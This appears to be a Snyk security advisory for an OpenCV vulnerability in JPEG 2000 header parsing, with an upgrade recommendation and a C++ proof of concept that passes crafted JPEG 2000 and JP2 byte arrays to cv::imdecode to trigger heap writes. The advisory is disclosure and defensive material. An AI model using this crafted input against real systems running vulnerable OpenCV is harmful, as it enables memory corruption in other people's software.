Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
Upgrade opencv/opencv to version 4.12.0 or higher.
Affected versions of this package are vulnerable to Use of Uninitialized Variable in the opj_jp2_read_header component when reading crafted JPEG images (the proof of concept below feeds a JPEG 2000 codestream and a JP2 box sequence to cv::imdecode). An attacker can achieve arbitrary heap buffer writes by supplying specially crafted JPEG files.
#include <cstddef>
#include <cstdint>
#include <limits>
#include <vector>

#include <opencv2/opencv.hpp>
#include <opencv2/imgcodecs/legacy/constants_c.h>
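/// Hands an in-memory encoded image to cv::imdecode and discards the result.
///
/// The bytes are copied into a std::vector and wrapped in a 1 x N CV_8UC1
/// cv::Mat header (no second copy) before decoding. Nothing is returned: the
/// callers in this file only need the decoder to run on the given input.
///
/// @param data  pointer to the encoded bytes; nullptr is tolerated and skipped
/// @param size  number of bytes readable at `data`
static void decode(const uint8_t* data, size_t size) {
    // Nothing to decode: skip rather than build a cv::Mat over a null/empty buffer.
    if (data == nullptr || size == 0) {
        return;
    }
    // cv::Mat takes its column count as int; reject inputs that would not fit
    // instead of letting the size_t -> int conversion wrap.
    if (size > static_cast<size_t>(std::numeric_limits<int>::max())) {
        return;
    }
    // Iterator-range construction: explicit, unlike the {first, last} brace form,
    // which only resolves to the same constructor because uint8_t* is not a uint8_t.
    std::vector<uint8_t> image_data(data, data + size);
    // Single-row, single-channel view over the copied bytes; image_data outlives it.
    cv::Mat data_matrix(1, static_cast<int>(image_data.size()), CV_8UC1, image_data.data());
    // cv::IMREAD_UNCHANGED is the current name of the legacy CV_LOAD_IMAGE_UNCHANGED flag.
    const cv::Mat decoded_matrix = cv::imdecode(data_matrix, cv::IMREAD_UNCHANGED);
    (void)decoded_matrix;  // decoded pixels are intentionally unused
}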
/// Entry point: runs decode() over two fixed inputs in a fixed order.
///
/// `data1` is a bare JPEG 2000 codestream (SOC, SIZ, COD, QCD, SOT, SOD and a
/// trailing 0x0000 marker); `data2` is a JP2 box sequence (signature, file
/// type, JP2 header with image header, and a truncated colour specification).
/// The five decode calls reproduce the original sequence exactly; the
/// repetition and order are presumably part of the trigger, so keep them.
int main() {
    const uint8_t data1[] = {
        0xff, 0x4f,              // SOC
        0xff, 0x51,              // SIZ
        0x00, 0x29,              // Lsiz = 41
        0x01, 0x05,              // Rsiz (capabilities)
        0x00, 0x00, 0x0a, 0xa2,  // Xsiz
        0x00, 0x01, 0xeb, 0xb8,  // Ysiz
        0x00, 0x00, 0x00, 0x33,  // XOsiz
        0x00, 0x00, 0x41, 0x80,  // YOsiz
        0x00, 0x0b, 0x00, 0x03,  // XTsiz
        0x2a, 0xb9, 0xd1, 0x4d,  // YTsiz
        0x00, 0x00, 0x00, 0x21,  // XTOsiz
        0x00, 0x00, 0x0f, 0xf5,  // YTOsiz
        0x00, 0x01,              // Csiz
        0x07,                    // Ssiz_0
        0x0a,                    // XRsiz_0
        0x37,                    // YRsiz_0
        0xff, 0x52,              // COD
        0x00, 0x0d,              // Lcod = 13
        0x05,                    // Scod
        0x00,                    // SGcod (A)
        0x00, 0x11,              // SGcod (B)
        0x00,                    // SGcod (C)
        0x00,                    // SPcod (D) / SPcoc (A)
        0x04,                    // SPcod (E) / SPcoc (B)
        0x04,                    // SPcod (F) / SPcoc (C)
        0x2c,                    // SPcod (G) / SPcoc (D)
        0x01,                    // SPcod (H) / SPcoc (E)
        0x86,                    // SPcod (I_i) / SPcoc (F_i)
        0xff, 0x5c,              // QCD
        0x00, 0x04,              // Lqcd = 4
        0x60,                    // Sqcx
        0xb7,                    // SPqcx_0
        0xff, 0x90,              // SOT
        0x00, 0x0a,              // Lsot = 10
        0x00, 0x00,              // Isot
        0x00, 0x00, 0x00, 0x00,  // Psot
        0x00,                    // TPsot
        0x76,                    // TNsot
        0xff, 0x93,              // SOD
        0x00, 0x00               // trailing invalid marker
    };

    const uint8_t data2[] = {
        0x00, 0x00, 0x00, 0x0c, 0x6a, 0x50, 0x20, 0x20, 0x0d, 0x0a, 0x87, 0x0a,  // JP2 signature box
        0x00, 0x00, 0x00, 0x14,                          // box length 20
        0x66, 0x74, 0x79, 0x70,                          // 'ftyp' (file type)
        0x6a, 0x70, 0x30, 0x20,                          // BR
        0xf9, 0xff, 0xff, 0xff,                          // MinV
        0x6a, 0x70, 0x33, 0x20,                          // CLi
        0x00, 0x00, 0x00, 0x31,                          // box length 49
        0x6a, 0x70, 0x32, 0x68,                          // 'jp2h' (JP2 header)
        0x00, 0x00, 0x00, 0x16,                          // box length 22
        0x69, 0x68, 0x64, 0x72,                          // 'ihdr' (image header)
        0x00, 0x80, 0x00, 0x00,                          // Height
        0x00, 0x00, 0x05, 0x00,                          // Width
        0x00, 0x03,                                      // NC (number of components)
        0x07,                                            // BPC
        0x07,                                            // C
        0x00,                                            // UnkC
        0x00,                                            // IPR
        0x00, 0x00, 0x00, 0x13,                          // box length 19
        0x63, 0x6f, 0x6c, 0x72,                          // 'colr' (colour specification)
        0x02,                                            // Meth
        0xff,                                            // PRECEDENCE
        0xff,                                            // APPROX
        0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08,  // ICC bytes
    };

    // Non-owning (pointer, length) pairs; the arrays above outlive the loop.
    struct Input {
        const uint8_t* bytes;
        size_t len;
    };
    const Input sequence[] = {
        {data1, sizeof(data1)},
        {data2, sizeof(data2)},
        {data2, sizeof(data2)},
        {data1, sizeof(data1)},
        {data2, sizeof(data2)},
    };
    for (const Input& in : sequence) {
        decode(in.bytes, in.len);
    }
    return 0;
}